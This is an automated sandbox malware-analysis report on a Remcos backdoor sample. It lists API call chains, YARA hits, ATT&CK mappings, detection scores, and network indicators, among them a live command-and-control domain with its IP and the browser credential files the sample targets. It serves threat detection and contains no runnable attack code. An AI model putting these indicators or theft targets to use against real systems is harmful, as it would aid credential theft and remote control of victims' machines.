                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,0_2_0041A7D9
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Window / User API: threadDelayed 4462
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Window / User API: threadDelayed 5046
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Window / User API: foregroundWindowGot 1772
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe TID: 6584 | Thread sleep count: 230 > 30
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe TID: 6584 | Thread sleep time: -115000s >= -30000s
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe TID: 2228 | Thread sleep count: 4462 > 30
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe TID: 2228 | Thread sleep time: -13386000s >= -30000s
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe TID: 2228 | Thread sleep count: 5046 > 30
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe TID: 2228 | Thread sleep time: -15138000s >= -30000s
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_0040928E
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_0041C322
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_0040C388
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_004096A0
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_00408847
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00407877 FindFirstFileW,FindNextFileW,0_2_00407877
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0044E8F9 FindFirstFileExA,0_2_0044E8F9
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040BB6B
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00419B86
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040BD72
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00407CD2
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000003.2071467066.00000000006C2000.00000004.00000020.00020000.00000000.sdmp, 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006C2000.00000004.00000020.00020000.00000000.sdmp, 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | API call chain: ExitProcess graph end node, graph_0-48956
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00434A8A
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CBE1
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00443355 mov eax, dword ptr fs:[00000030h] 0_2_00443355
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_004120B2 GetProcessHeap,HeapFree,0_2_004120B2
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0043503C
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00434A8A
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043BB71
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00434BD8 SetUnhandledExceptionFilter,0_2_00434BD8
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 0_2_00412132
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00419662 mouse_event,0_2_00419662
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerh
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerM5\.js+B3
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerb
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerN
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerM5\30\9B!
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager+
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerM5\
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager,
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managers
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.0000000000683000.00000004.00000020.00020000.00000000.sdmp, 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager B(
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerM5\006B&
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmp, registros.dat.0.dr | Binary or memory string: [Program Manager]
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00434CB6 cpuid 0_2_00434CB6
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: GetLocaleInfoA,0_2_0040F90C
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: EnumSystemLocalesW,0_2_0045201B
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: EnumSystemLocalesW,0_2_004520B6
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00452143
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: GetLocaleInfoW,0_2_00452393
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: EnumSystemLocalesW,0_2_00448484
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_004524BC
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: GetLocaleInfoW,0_2_004525C3
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00452690
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: GetLocaleInfoW,0_2_0044896D
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00451D58
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: EnumSystemLocalesW,0_2_00451FD0
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00404F51 GetLocalTime,CreateEventA,CreateThread,0_2_00404F51
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0041B69E GetComputerNameExW,GetUserNameW,0_2_0041B69E
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00449210
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Stealing of Sensitive Information

                        Source: Yara match | File source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, type: SAMPLE
                        Source: Yara match | File source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.0.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe PID: 5000, type: MEMORYSTR
                        Source: Yara match | File source: C:\ProgramData\remcos\registros.dat, type: DROPPED
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0_2_0040BA4D
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 0_2_0040BB6B
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: \key3.db 0_2_0040BB6B

                        Remote Access Functionality

                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-8AGIM5
                        Source: Yara match | File source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, type: SAMPLE
                        Source: Yara match | File source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.0.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe PID: 5000, type: MEMORYSTR
                        Source: Yara match | File source: C:\ProgramData\remcos\registros.dat, type: DROPPED
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: cmd.exe 0_2_0040569A
                        MITRE ATT&CK Matrix (one line per tactic, techniques in the original column order; a number in parentheses is the count shown in that cell of the original grid):

                        Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                        Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                        Execution: Native API (1); Command and Scripting Interpreter (12); Service Execution (2); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                        Persistence: DLL Side-Loading (1); Windows Service (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                        Privilege Escalation: DLL Side-Loading (1); Bypass User Account Control (1); Access Token Manipulation (1); Windows Service (1); Process Injection (11); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                        Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); DLL Side-Loading (1); Bypass User Account Control (1); Masquerading (1); Virtualization/Sandbox Evasion (1); Access Token Manipulation (1); Process Injection (11); HTML Smuggling; Dynamic API Resolution
                        Credential Access: OS Credential Dumping (1); Input Capture (211); Credentials In Files (2); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                        Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); File and Directory Discovery (2); System Information Discovery (23); Security Software Discovery (21); Virtualization/Sandbox Evasion (1); Process Discovery (2); Application Window Discovery (1); System Owner/User Discovery (1)
                        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                        Collection: Archive Collected Data (11); Input Capture (211); Clipboard Data (3); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                        Command and Control: Ingress Tool Transfer (12); Encrypted Channel (2); Non-Standard Port (1); Remote Access Software (1); Non-Application Layer Protocol (2); Application Layer Protocol (22); Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                        Impact: System Shutdown/Reboot (1); Defacement (1); Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement

                                       Source | Detection | Scanner | Label
                                       1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | 87% | ReversingLabs | Win32.Backdoor.Remcos
                                       1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | 86% | Virustotal |
                                       1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | 100% | Avira | BDS/Backdoor.Gen
                                       1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | 100% | Joe Sandbox ML |
                        No Antivirus matches
                        No Antivirus matches
                                       Source | Detection | Scanner | Label
                                       remcos2025rem.duckdns.org | 0% | Virustotal |
                                       Source | Detection | Scanner | Label
                                       remcos2025rem.duckdns.org | 100% | Avira URL Cloud | malware
                                       remcos2025rem.duckdns.org | 0% | Virustotal |
                                       Name | IP | Active | Malicious | Antivirus Detection | Reputation
                                       remcos2025rem.duckdns.org | 186.169.34.190 | true | true | | unknown
                                       geoplugin.net | 178.237.33.50 | true | false | | high
                                       Name | Malicious | Antivirus Detection | Reputation
                                       http://geoplugin.net/json.gp | false | | high
                                       remcos2025rem.duckdns.org | true | 0% (Virustotal); Avira URL Cloud: malware | unknown
                                       Name | Source | Malicious | Antivirus Detection | Reputation
                                       http://geoplugin.net/json.gp(1 | 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                       http://geoplugin.net/json.gp/C | 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | false | | high
                                       http://geoplugin.net/json.gp91n | 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                       http://geoplugin.net/json.gpl | 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.0000000000683000.00000004.00000020.00020000.00000000.sdmp, 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000003.2071467066.0000000000683000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                       http://geoplugin.net/json.gpSystem32 | 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                       IP | Domain | Country | ASN | ASN Name | Malicious
                                       186.169.34.190 | remcos2025rem.duckdns.org | Colombia | 3816 | COLOMBIATELECOMUNICACIONESSAESPCO | true
                                       178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
                                       Joe Sandbox version: 41.0.0 Charoite
                                       Analysis ID: 1559856
                                       Start date and time: 2024-11-21 01:06:09 +01:00
                                       Joe Sandbox product: CloudBasic
                                       Overall analysis duration: 0h 6m 29s
                                       Hypervisor based Inspection enabled: false
                                       Report type: full
                                       Cookbook file name: default.jbs
                                       Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                       Number of new started processes analysed: 4
                                       Number of new started drivers analysed: 0
                                       Number of existing processes analysed: 0
                                       Number of existing drivers analysed: 0
                                       Number of injected processes analysed: 0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                       Analysis Mode: default
                                       Analysis stop reason: Timeout
                                       Sample name: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe
                                       Detection: MAL
                                       Classification: mal100.rans.troj.spyw.expl.evad.winEXE@1/2@2/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 38
                                      • Number of non-executed functions: 218
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Override analysis time to 240s for sample files taking high CPU consumption
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
19:07:32 | API Interceptor | 7069287x Sleep call for process: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
186.169.34.190 | 17321475076803448d101dbd20e7eb8f565a5a8db8f024eed2198a76bc7e212f0903aa57bf101.dat-decoded.exe | malicious | AsyncRAT, DcRat |
178.237.33.50 | 1732143786cec792bea7f8ce7f818c031173ce52fabd19dde842f74b07fc234dc9f3fa1dcf839.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | seethebestthignswhichgivingbestopportunities.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher | geoplugin.net/json.gp
178.237.33.50 | pi-77159.xls | malicious | Remcos, HTMLPhisher | geoplugin.net/json.gp
178.237.33.50 | sostener.vbs | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe | malicious | Remcos, DBatLoader | geoplugin.net/json.gp
178.237.33.50 | Pago_BBVA.pdf.bat.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | USD470900_COPY_800BLHSBC882001.PDF.bat | malicious | Remcos, DBatLoader | geoplugin.net/json.gp
178.237.33.50 | globe_product_order_korea_buy_20_11_2024_000000000000000000.vbs | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | file.exe | malicious | Remcos | geoplugin.net/json.gp
Match | Associated Sample Name / URL | Detection | Threat Name | Context
remcos2025rem.duckdns.org | 17321475076803448d101dbd20e7eb8f565a5a8db8f024eed2198a76bc7e212f0903aa57bf101.dat-decoded.exe | malicious | AsyncRAT, DcRat | 186.169.34.190
geoplugin.net | 1732143786cec792bea7f8ce7f818c031173ce52fabd19dde842f74b07fc234dc9f3fa1dcf839.dat-decoded.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | seethebestthignswhichgivingbestopportunities.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher | 178.237.33.50
geoplugin.net | pi-77159.xls | malicious | Remcos, HTMLPhisher | 178.237.33.50
geoplugin.net | sostener.vbs | malicious | Remcos | 178.237.33.50
